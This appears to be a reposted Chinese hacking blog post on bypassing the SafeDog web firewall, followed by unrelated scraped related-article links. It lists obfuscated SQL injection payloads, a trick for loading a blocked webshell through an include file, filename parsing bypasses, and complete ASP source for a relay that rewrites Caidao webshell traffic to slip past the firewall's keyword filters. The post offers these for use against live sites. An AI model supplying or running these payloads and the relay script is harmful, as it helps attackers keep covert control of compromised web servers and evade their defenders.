秒杀安全狗的经验总结
过安全狗主要过哪几方面:
1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。
现在一点一点讲:
1.过注入
方法一:a.asp?aaa=%00&id=sql语句
方法二: a.asp?id=sql语句 里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
方法一:上传一个大马 然后访问http://sss.com/dama.asp ; 访问后出现拦截。
那么解决方法 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!--#include file="dama.jpg" --> 这样再访问da.asp 就不会被拦截了。
3.过菜刀连接一句话被拦截
方法一:不用菜刀连接一句话,用别的一句话连接端。
方法二:中转下连接菜刀,把过滤掉的词替换掉。
4.过1.asp;.jpg这样的文件拦截
方法一:;1.asp;.jpg
方法二:保密
具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!
下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.hack70.cn/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话***的后缀类型
例如:http://www.hack70.cn/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀
这个脚本暂时支持.php .aspx的一句话连接 .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!
<%
'饶过的原理,抓菜刀连接webshell的包 然后研究安全狗过滤了哪些关键字 中转替换掉那些过滤的关键字 就成!
JmStr=Replace(Request.Form,"$_POST","$_REQUEST")
JmStr=Replace(JmStr,"->|","-->|")
JmStr=Replace(JmStr,"@eval(","@eval (")
JmStr=Replace(JmStr,"System.Convert.FromBase64String","System.Convert. FromBase64String")
JMUrl=request("dz")
response.write request("dz")
JmRef=JMUrl
JmCok=""
'作者: 鬼哥
'菜刀突破安全狗连接!
'www.hack70.cn
response.write PostData(JMUrl,JmStr,JmCok,JmRef)
Function PostData(PostUrl,PostStr,PostCok,PostRef)
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "POST",PostUrl,False
.SetRequestHeader "Content-Length",Len(PostStr)
.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
.SetRequestHeader "Referer",PostRef
'.SetRequestHeader "Cookie",PostCok
.Send PostStr
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function URLEncoding(vstrin)
strReturn=""
Dim i
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20
strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW增加转换+字符
'strReturn=Replace(strReturn,过滤字符,"转换为字符") '在此增加要过滤的代码
URLEncoding=strReturn
End Function
%>
转载于:https://blog.51cto.com/biock/1643919
秒杀安全狗的经验总结相关推荐
- 酷狗社招面试 java_酷狗面试经验
面试过程: 1.Java中的所有类,必须被装载到jvm中才能运行,这个装载工作是由jvm中的类装载器完成的, 类装载器所做的工作实质是把类文件从硬盘读取到内存中 2.java中的类大致分为三种: 1. ...
- 敖丙带你设计【秒杀系统】
我之前写过一个秒杀系统的文章不过有些许瑕疵,所以我准备在之前的基础上进行二次创作,不过让我决心二创秒杀系统的原因是我最近面试了很多读者,动不动就是秒杀系统把我整蒙蔽了,我懵的主要是秒杀系统的细节大家都 ...
- 面试了十个应届生九个都是秒杀系统,你确定你们那是秒杀?
点赞再看,养成习惯,微信搜一搜[三太子敖丙]关注这个互联网苟且偷生的工具人. 本文 GitHub https://github.com/JavaFamily 已收录,有一线大厂面试完整考点.资料以及我 ...
- PMP项目管理师考试---准备与学习过程经验分享
文章目录 1. 决定考试PMP 2. 选择培训机构 3. 学习 4. 考试过程 5. 考试之后的话 5.1 补上考试结果 1. 决定考试PMP 在2018年中的时候身边有一个朋友在朋友圈晒出了考PMP ...
- 阿里面试官问我:如何设计秒杀系统?我给出接近满分的回答
你知道的越多,你不知道的越多 点赞再看,养成习惯 GitHub上已经开源 https://github.com/JavaFamily 有一线大厂面试点脑图和个人联系方式,欢迎Star和指教 正文 首先 ...
- 一文搞懂秒杀系统,欢迎参与开源,提交PR,提高竞争力。早日上岸,升职加薪。
前言 秒杀和高并发是面试的高频考点,也是我们做电商项目必知必会的场景.欢迎大家参与我们的开源项目,提交PR,提高竞争力.早日上岸,升职加薪. 知识点详解 秒杀系统架构图 秒杀流程图 秒杀系统设计 这篇 ...
- 商城模块秒杀业务的设计与实战
正文 首先设计一个系统之前,我们需要先确认我们的业务场景是怎么样子的,我们就设计一个便于理解的秒杀场景吧. 场景 我们现场要卖100件下面这个看着些不错的鱼竿,然后我们根据以往这样秒杀活动的数据经验来 ...
- 秒杀系统设计(分布式微服务)
秒杀系统设计 - 基于分布式微服务 流程图(分布式) 例子 问题 高并发 超卖 恶意请求 链接暴露 数据库 解决方案 前端 资源静态化 秒杀链接加盐 限流 物理控制 前端限流 后端限流 Nginx 风 ...
- 学习一下秒杀系统的设计,以及需要考虑的问题
学习一下秒杀系统的设计,以及需要考虑的问题,学习一下模块化 正文 首先设计一个系统之前,我们需要先确认我们的业务场景是怎么样子的,我就带着大家一起假设一个场景好吧. 我们现场要卖100件婴儿纸尿裤,然 ...
最新文章
- UBUNTU 下查看所有的C库函数和查询 LINUX 编成必备
- python网络爬虫的基本步骤-详解Python网络爬虫功能的基本写法
- mktime函数实现获取当前系统时间
- vue 方法里面修改样式_vue中修改swiper样式
- boost::foreach模块右值const的测试程序
- echarts 弹出放大_Echarts图标增加全屏/放大功能
- 总结阐述Cocos2d-X与Cocos2d-iphone区别
- java开源播放器_JavaFX/Java8开发的开源音乐播放器
- 【Java Web开发学习】Spring MVC 拦截器HandlerInterceptor
- mongovue mysql_MongoDB 客户端 MongoVue
- 微信小程序网易云音乐
- c# NPOI 导出Excel 冻结窗格
- 自用大智慧策略l2支持行情
- mysql 唯一约束_Mysql 唯一性约束添加
- MySQL 数据库重启
- python知识图谱代码_贪心学院第二个主题代码--Python岗位知识图谱
- vue使用百度地图,添加线路、站点,简易封装,方便修改(vue使用百度地图实现添加多条线路、多个站点)
- Anaconda pytorch cpu版本安装——图文详情版
- IDEA思维导图生成插件
- 2007全球杀毒软件排名 + 2007全球防火墙排名